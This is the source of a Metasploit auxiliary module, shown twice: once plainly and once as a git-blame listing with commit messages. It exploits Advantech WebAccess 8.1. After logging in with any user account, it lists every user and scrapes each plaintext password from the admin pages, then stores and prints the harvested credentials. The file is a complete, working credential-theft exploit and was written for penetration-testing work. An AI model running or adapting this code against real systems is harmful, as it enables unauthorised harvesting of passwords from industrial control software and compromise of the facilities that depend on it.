metasploit-framework/modules/auxiliary/gather/advantech_webaccess_creds.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Advantech WebAccess 8.1 Post Authentication Credential Collector",
      'Description'    => %q{
        This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.
        Although authentication is required, any level of user permission can exploit this vulnerability.

        Note that 8.2 is not suitable for this.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'h00die', # Pointed out the obvious during a PR review for CVE-2017-5154
          'sinn3r', # Metasploit module
        ],
      'References'     =>
        [
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229']
        ],
      'DisclosureDate' => "Jan 21 2017"
    ))

    register_options(
      [
        OptString.new('WEBACCESSUSER', [true, 'Username for Advantech WebAccess', 'admin']),
        OptString.new('WEBACCESSPASS', [false, 'Password for Advantech WebAccess', '']),
        OptString.new('TARGETURI', [true, 'The base path to Advantech WebAccess', '/']),
      ])
  end

  def do_login
    vprint_status("Attempting to login as '#{datastore['WEBACCESSUSER']}:#{datastore['WEBACCESSPASS']}'")

    uri = normalize_uri(target_uri.path, 'broadweb', 'user', 'signin.asp')

    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => uri,
      'vars_post' => {
        'page' => '/',
        'pos'  => '',
        'username' => datastore['WEBACCESSUSER'],
        'password' => datastore['WEBACCESSPASS'],
        'remMe'    => '',
        'submit1'  => 'Login'
      }
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out while trying to login')
    end

    if res.headers['Location'] && res.headers['Location'] == '/broadweb/bwproj.asp'
      print_good("Logged in as #{datastore['WEBACCESSUSER']}")
      report_cred(
        user: datastore['WEBACCESSUSER'],
        password: datastore['WEBACCESSPASS'],
        status: Metasploit::Model::Login::Status::SUCCESSFUL
      )
      return res.get_cookies.scan(/(ASPSESSIONID\w+=\w+);/).flatten.first || ''
    end

    print_error("Unable to login as '#{datastore['WEBACCESSUSER']}:#{datastore['WEBACCESSPASS']}'")

    nil
  end

  def get_user_cred_detail(sid, user)
    vprint_status("Gathering password for user: #{user}")

    uri = normalize_uri(target_uri.path, 'broadWeb','user', 'upAdminPg.asp')

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri,
      'cookie' => sid,
      'vars_get' => {
        'uname' => user
      }
    })

    unless res
      print_error("Unable to gather password for user #{user} due to a connection timeout")
      return nil
    end

    html = res.get_html_document
    pass_field = html.at('input[@name="Password"]')

    pass_field ? pass_field.attributes['value'].text : nil
  end

  def get_users_page(sid)
    vprint_status("Checking user page...")

    uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'AdminPg.asp')

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri,
      'cookie' => sid
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out while checking AdminPg.asp')
    end

    html = res.get_html_document

    users = html.search('a').map { |a|
      Rex::Text.uri_decode(a.attributes['href'].text.scan(/broadWeb\/user\/upAdminPg\.asp\?uname=(.+)/).flatten.first || '')
    }.delete_if { |user| user.blank? }

    users
  end

  def report_cred(opts)
    service_data = {
      address: rhost,
      port: rport,
      service_name: 'webaccess',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: DateTime.now,
      core: create_credential(credential_data),
      status: opts[:status],
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def run
    cookie = do_login
    users = get_users_page(cookie)

    users.each do |user|
      pass = get_user_cred_detail(cookie, user)

      if pass
        report_cred(
          user: user,
          password: pass,
          status: Metasploit::Model::Login::Status::SUCCESSFUL,
          proof: 'AdminPg.asp'
        )

        print_good("Found password: #{user}:#{pass}")
      end
    end
  end
end
Add Advantech WebAccess Post Auth Credential Collector 2017-01-26 20:53:59 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
Add Advantech WebAccess Post Auth Credential Collector 2017-01-26 20:53:59 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`class MetasploitModule < Msf::Auxiliary`
			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info={})`
			`super(update_info(info,`
Update description 2017-01-26 20:58:02 +00:00			`'Name' => "Advantech WebAccess 8.1 Post Authentication Credential Collector",`
Add Advantech WebAccess Post Auth Credential Collector 2017-01-26 20:53:59 +00:00			`'Description' => %q{`
Update module description 2017-01-26 22:35:15 +00:00			`This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.`
			`Although authentication is required, any level of user permission can exploit this vulnerability.`
Update description 2017-01-26 20:58:02 +00:00
			`Note that 8.2 is not suitable for this.`
Add Advantech WebAccess Post Auth Credential Collector 2017-01-26 20:53:59 +00:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'h00die', # Pointed out the obvious during a PR review for CVE-2017-5154`
			`'sinn3r', # Metasploit module`
			`],`
			`'References' =>`
			`[`
			`['URL', 'https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229']`
			`],`
			`'DisclosureDate' => "Jan 21 2017"`
			`))`

			`register_options(`
			`[`
			`OptString.new('WEBACCESSUSER', [true, 'Username for Advantech WebAccess', 'admin']),`
Pass should not be forced 2017-01-26 23:48:41 +00:00			`OptString.new('WEBACCESSPASS', [false, 'Password for Advantech WebAccess', '']),`
Add Advantech WebAccess Post Auth Credential Collector 2017-01-26 20:53:59 +00:00			`OptString.new('TARGETURI', [true, 'The base path to Advantech WebAccess', '/']),`
Fix msf/core and self.class msftidy warnings Also fixed rex requires. 2017-05-03 20:42:21 +00:00			`])`
Add Advantech WebAccess Post Auth Credential Collector 2017-01-26 20:53:59 +00:00			`end`

			`def do_login`
			`vprint_status("Attempting to login as '#{datastore['WEBACCESSUSER']}:#{datastore['WEBACCESSPASS']}'")`

			`uri = normalize_uri(target_uri.path, 'broadweb', 'user', 'signin.asp')`

			`res = send_request_cgi({`
			`'method' => 'POST',`
			`'uri' => uri,`
			`'vars_post' => {`
			`'page' => '/',`
			`'pos' => '',`
			`'username' => datastore['WEBACCESSUSER'],`
			`'password' => datastore['WEBACCESSPASS'],`
			`'remMe' => '',`
			`'submit1' => 'Login'`
			`}`
			`})`

			`unless res`
			`fail_with(Failure::Unknown, 'Connection timed out while trying to login')`
			`end`

			`if res.headers['Location'] && res.headers['Location'] == '/broadweb/bwproj.asp'`
			`print_good("Logged in as #{datastore['WEBACCESSUSER']}")`
			`report_cred(`
			`user: datastore['WEBACCESSUSER'],`
			`password: datastore['WEBACCESSPASS'],`
			`status: Metasploit::Model::Login::Status::SUCCESSFUL`
			`)`
			`return res.get_cookies.scan(/(ASPSESSIONID\w+=\w+);/).flatten.first \|\| ''`
			`end`

			`print_error("Unable to login as '#{datastore['WEBACCESSUSER']}:#{datastore['WEBACCESSPASS']}'")`

			`nil`
			`end`

			`def get_user_cred_detail(sid, user)`
			`vprint_status("Gathering password for user: #{user}")`

			`uri = normalize_uri(target_uri.path, 'broadWeb','user', 'upAdminPg.asp')`

			`res = send_request_cgi({`
			`'method' => 'GET',`
			`'uri' => uri,`
			`'cookie' => sid,`
			`'vars_get' => {`
			`'uname' => user`
			`}`
			`})`

			`unless res`
			`print_error("Unable to gather password for user #{user} due to a connection timeout")`
			`return nil`
			`end`

			`html = res.get_html_document`
			`pass_field = html.at('input[@name="Password"]')`

Fix nil for empty pass 2017-01-26 23:51:20 +00:00			`pass_field ? pass_field.attributes['value'].text : nil`
Add Advantech WebAccess Post Auth Credential Collector 2017-01-26 20:53:59 +00:00			`end`

			`def get_users_page(sid)`
			`vprint_status("Checking user page...")`

			`uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'AdminPg.asp')`

			`res = send_request_cgi({`
			`'method' => 'GET',`
			`'uri' => uri,`
			`'cookie' => sid`
			`})`

			`unless res`
			`fail_with(Failure::Unknown, 'Connection timed out while checking AdminPg.asp')`
			`end`

			`html = res.get_html_document`

			`users = html.search('a').map { \|a\|`
URI decode users 2017-01-27 00:30:17 +00:00			`Rex::Text.uri_decode(a.attributes['href'].text.scan(/broadWeb\/user\/upAdminPg\.asp\?uname=(.+)/).flatten.first \|\| '')`
			`}.delete_if { \|user\| user.blank? }`
Add Advantech WebAccess Post Auth Credential Collector 2017-01-26 20:53:59 +00:00
			`users`
			`end`

			`def report_cred(opts)`
			`service_data = {`
			`address: rhost,`
			`port: rport,`
			`service_name: 'webaccess',`
			`protocol: 'tcp',`
			`workspace_id: myworkspace_id`
			`}`

			`credential_data = {`
			`origin_type: :service,`
			`module_fullname: fullname,`
			`username: opts[:user],`
			`private_data: opts[:password],`
			`private_type: :password`
			`}.merge(service_data)`

			`login_data = {`
			`last_attempted_at: DateTime.now,`
			`core: create_credential(credential_data),`
			`status: opts[:status],`
			`proof: opts[:proof]`
			`}.merge(service_data)`

			`create_credential_login(login_data)`
			`end`

			`def run`
			`cookie = do_login`
			`users = get_users_page(cookie)`

			`users.each do \|user\|`
			`pass = get_user_cred_detail(cookie, user)`

Fix nil for empty pass 2017-01-26 23:51:20 +00:00			`if pass`
			`report_cred(`
			`user: user,`
			`password: pass,`
			`status: Metasploit::Model::Login::Status::SUCCESSFUL,`
			`proof: 'AdminPg.asp'`
			`)`

			`print_good("Found password: #{user}:#{pass}")`
			`end`
Add Advantech WebAccess Post Auth Credential Collector 2017-01-26 20:53:59 +00:00			`end`
			`end`
			`end`